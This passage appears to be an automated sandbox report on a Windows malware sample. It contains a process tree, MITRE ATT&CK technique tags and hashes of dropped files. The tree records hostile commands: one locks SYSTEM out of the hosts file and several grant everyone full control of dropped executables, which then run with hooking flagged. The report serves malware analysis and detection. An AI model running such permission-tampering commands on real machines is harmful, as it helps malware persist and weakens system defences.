        C:\Windows\SysWOW64\cacls.exe  PID:5860
          cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

C:\Windows\SysWOW64\jobnom.exe  PID:2892
  cmd: C:\Windows\SysWOW64\jobnom.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  PID:4132
  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3736 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\cmd.EXE  PID:3364
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F
    C:\Windows\system32\cmd.exe  PID:5040
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe  PID:3684
      cmd: cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F

C:\Windows\system32\cmd.EXE  PID:2008
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F
    C:\Windows\system32\cmd.exe  PID:3844
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe  PID:4488
      cmd: cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F

C:\Windows\system32\cmd.EXE  PID:1236
  cmd: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\naustif.exe
    C:\Windows\ime\naustif.exe  PID:1544
      cmd: C:\Windows\ime\naustif.exe
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE  PID:6864
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F
    C:\Windows\system32\cmd.exe  PID:3888
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe  PID:4344
      cmd: cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F

C:\Windows\system32\cmd.EXE  PID:7004
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F
    C:\Windows\system32\cmd.exe  PID:3120
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\system32\cacls.exe  PID:5656
      cmd: cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F

C:\Windows\system32\cmd.EXE  PID:6832
  cmd: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\naustif.exe
    C:\Windows\ime\naustif.exe  PID:3484
      cmd: C:\Windows\ime\naustif.exe
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1): Disable or Modify System Firewall (1)
- Modify Registry (1)
Downloads

- Filesize: 95KB
  MD5: 86316be34481c1ed5b792169312673fd
  SHA1: 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
  SHA256: 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
  SHA512: 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

- Filesize: 275KB
  MD5: 4633b298d57014627831ccac89a2c50b
  SHA1: e5f449766722c5c25fa02b065d22a854b6a32a5b
  SHA256: b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
  SHA512: 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

- Filesize: 4.1MB
  MD5: 7f88884b1cc8fc36028adabdb57381b9
  SHA1: 60a293ad02939a2db41a10cc2fc22372228123b9
  SHA256: d35eaf1b5a9addffac244ce114ce74a62201d73336bdcb72b7d78c12e43de599
  SHA512: 3bedbf8ea9bc95c0b72512bb04dcbcfa58c98ef3ccb4879a5417328a8adc411916d5837b243ff262209b5ede29e68a01bb651b17c08ae5a618dca5f8bb7efa4b

- Filesize: 3.7MB
  MD5: 0172d38feac50b0259c1172df74d464a
  SHA1: 4f075de4eecdcd43190e148cc9de8dd1d9eb5483
  SHA256: c11426faaee41e207994bfac1c7b10308e2097bc7e8d44f3f7745d38841780cd
  SHA512: 0542fcfd0b18386224f91e4666303ec347aba32af9117029a6b4754c1b3d4be96554be245e05707bbc1e5c622ed3acf37c1d6e90b07a8d344566707833322499

- Filesize: 7.6MB
  MD5: 40ea7bfbcd95783ab549542dbfa7dde2
  SHA1: 57b82c721a80b808b44b246bb2720ebad19aa394
  SHA256: eeb03fa31b43612010331f566977e4fa32a584c7b452b16997e31fe63c2e7211
  SHA512: 861daaff64b3ebc2eab191eff5b67c80a4706b883f4500b3570b6f3d5cbb237ce763fc276e3d313a2caa2954f17d7132505b12ae988248fbbae4362ce0814f47

- Filesize: 2.9MB
  MD5: c2c05846e25e82f730db264ef59ab6bb
  SHA1: 4da4a629dfc91f8c6d00e0ddd6ebe24c73addc87
  SHA256: 99f5a47b209de8e36f12fe320d8de32d0446c20fd320cfb3b523dc602f909854
  SHA512: 57cf5b26f99c34b8b7815e6e2b2ece128996fe779a2fe8a205633e686af07e0e5a0012322bd42d07334ed366ca57d1f2c196c3b6006c82bfad38b9363e3a59c0

- Filesize: 814KB
  MD5: 97b77cddc3d9b6656b44f9fdb4c7fc8c
  SHA1: a23684afe4ae4cfe86bf151f206808c6de0a7cc4
  SHA256: 3f63e882812fd7a97dc096ba097caf288ba4eff415d96bc572ee18911c319251
  SHA512: 9d92d15388c051a5368497a1fca7dc06d0ad6f4a1da5b93b175d78274d83e7f38b79603f7636370601e2d84e189af33255105d8bff13ef22a24d808f5c5c5b62

- Filesize: 26.7MB
  MD5: 6d3fb4da3edfbe2a0823541efc2cbceb
  SHA1: 293eb6af2ae54691b7c62c7227f2c3347aae9d4b
  SHA256: dfc924ba76bdd0ded5261a1f3309740ecaec3160eacbb9cac5552423bad21a02
  SHA512: 13d5fb6041434e8178c2c4109aca04bc5018b8214434a71fec271a835648b11e5790b9ad9a49b997879823ed3635a58bbb2b7d68b103ccbab1f62762b48c7866

- Filesize: 2.2MB
  MD5: ada900713dd6e51e897afaae96fc4cd8
  SHA1: a80de9152d9e8f18456900b0b8091f54b37b0e81
  SHA256: 8713f747edfef904a149a09d34e75c0030af043e4fc720ffd1bd23af230fef13
  SHA512: 624c2f857180d22a3af15aeeef10a58905d1e59ea416b766ee47d7d2b45cc95ae22fdd22ebab672225ec83f8e0bc8748808169af9ad3e8a9330d330d2be003f2

- Filesize: 20.8MB
  MD5: 4f6e38798542094a2862a5e3d8c0debe
  SHA1: a1f58ceef32cfde6746c49c76b4aab0b9da7b2c8
  SHA256: a4299f9abfbfb3eb653c4359d0a7444d24639e6808b109bee1eeb0f142682581
  SHA512: 3a8400630e4ceda337eceded8e7773dc963aa87f88c529bcf5a884d27bf16188842ad446381b7a7fddb9a9a94ebb5b357422b9d430470012e92709415ace5aa5

- Filesize: 5.6MB
  MD5: f03e5fc4ed19b5287106c69f683c5f32
  SHA1: f66b6cb690f4b17368714c02f65901eca0502091
  SHA256: 4e6fe8a62574f9b4ece620247d9823af6db3ef157f6dd395dae4164ca653543b
  SHA512: eb9724f924da64a0563f1e84058829f0a30a79eb209653c919f819161232764c60ab1f1a155a873339102b6ef950a34c6eee201a98acf4bf0690c9394ce8b042

- Filesize: 44.7MB
  MD5: f678fd20ebb7ad41947527f231d77fad
  SHA1: b191e1db6ef38102f971e599fbf6ec4bd15888e7
  SHA256: 3738aa502849ec0e91356e4eee3166f7529e4d0c86fab90d1ad4f511e676721c
  SHA512: c37d1fccccc9dc69597560d76c868ad439adf2ceba626942afa4c607f6488c4beea513eb678add92e1444fb48bd3b9aa3be1556eccaaa037427eb5e73ec11a98

- Filesize: 1.2MB
  MD5: 0f1c8cf7a242e81c02bff40e465f6d8c
  SHA1: 86c79f31e048af1acc5f1aec6f38d49fa541b1b6
  SHA256: ce1923b6a6480e693c05bb21f04842431840a006186b7499bebc3081c9708cca
  SHA512: 1e1124ea8f6afaf43082592760c2fc75242c7a884e5e9dc8407e99a75add8721a35616db3f74dca25ded579085a5b1152880fe5d56fdc31c94015bb719dc448b

- Filesize: 34.2MB
  MD5: ef7dcac715840aa43ab93c3d7a5d7f97
  SHA1: 2be1a0db8be670685d9f13d4aba0466d6edf185a
  SHA256: af7d34c3e8d2980892cd506726fe143de22699d6b62dfa48fb9e5c21745ab7fd
  SHA512: 28598a555cff1fbca23de2090df1be16198a10c468d70a1eb36d6b524670ac4dbee3fd0a4bba7436d3b2ca01894f19a45c11e3b1a17e03594a6673e4824e4136

- Filesize: 1.9MB
  MD5: d041e7c8a0d7cd96c4ba1d3357fd4a18
  SHA1: 10cfc52c78b402a6e94d4402115cbaf85e80a50f
  SHA256: 0c220045871925c94a06dcae9219200d7ab0121cd3a19d91c337e9deb68e171c
  SHA512: 75046e9ea60eaa1d44d5af15f7681d230d23d4e26aa5aeb484d96eb4ee9364d16d3edf7df470b500f124db24b29333c3f7279fef13576ccdad7f28cc44f24b4d

- Filesize: 693B
  MD5: f2d396833af4aea7b9afde89593ca56e
  SHA1: 08d8f699040d3ca94e9d46fc400e3feb4a18b96b
  SHA256: d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
  SHA512: 2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

- Filesize: 11KB
  MD5: 2ae993a2ffec0c137eb51c8832691bcb
  SHA1: 98e0b37b7c14890f8a599f35678af5e9435906e1
  SHA256: 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
  SHA512: 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

- Filesize: 6KB
  MD5: b648c78981c02c434d6a04d4422a6198
  SHA1: 74d99eed1eae76c7f43454c01cdb7030e5772fc2
  SHA256: 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
  SHA512: 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

- Filesize: 126KB
  MD5: e8d45731654929413d79b3818d6a5011
  SHA1: 23579d9ca707d9e00eb62fa501e0a8016db63c7e
  SHA256: a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
  SHA512: df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

- Filesize: 343KB
  MD5: 2b4ac7b362261cb3f6f9583751708064
  SHA1: b93693b19ebc99da8a007fed1a45c01c5071fb7f
  SHA256: a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
  SHA512: c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

- Filesize: 72KB
  MD5: cbefa7108d0cf4186cdf3a82d6db80cd
  SHA1: 73aeaf73ddd694f99ccbcff13bd788bb77f223db
  SHA256: 7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
  SHA512: b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

- Filesize: 13.8MB
  MD5: ff226c73f99d4860f7e1d9674c77f0b5
  SHA1: 5f661819a6bd305700a9ded1df8025d8a6c5651d
  SHA256: 74d843986ee7495fa6f381d2981d7c2898b1e974173b5e1bed2dcfa815af8f7f
  SHA512: 7688e574bb7f4cbbb7429fed6df48d38a9f692dc62b78eb31f724f298573133243d68f9355259aa15eaf14300336a64a352f189ca648f01f9d758bf1a7e63386

- Filesize: 1KB
  MD5: c838e174298c403c2bbdf3cb4bdbb597
  SHA1: 70eeb7dfad9488f14351415800e67454e2b4b95b
  SHA256: 1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
  SHA512: c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

- Filesize: 381KB
  MD5: fd5efccde59e94eec8bb2735aa577b2b
  SHA1: 51aaa248dc819d37f8b8e3213c5bdafc321a8412
  SHA256: 441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
  SHA512: 74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

- Filesize: 332KB
  MD5: ea774c81fe7b5d9708caa278cf3f3c68
  SHA1: fc09f3b838289271a0e744412f5f6f3d9cf26cee
  SHA256: 4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
  SHA512: 7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

- Filesize: 160B
  MD5: 60672932bca7d7eccf1d23c42fafd579
  SHA1: 6d2b9b488b2ea44c0745b6cc139de7cf9c41b9f4
  SHA256: dad98a9c14840eec0073dcd6cff3d1fb1772484c8bcb708e3b7df537135b2bc6
  SHA512: 775d189ad603cbc911d790a2338425ac90006f266a3c65ba7e876bd26abab258ef2fae28925b9d1df96f404f1c9a38335a4a84581458076cfb31e3252887169d

- Filesize: 424KB
  MD5: e9c001647c67e12666f27f9984778ad6
  SHA1: 51961af0a52a2cc3ff2c4149f8d7011490051977
  SHA256: 7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
  SHA512: 56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe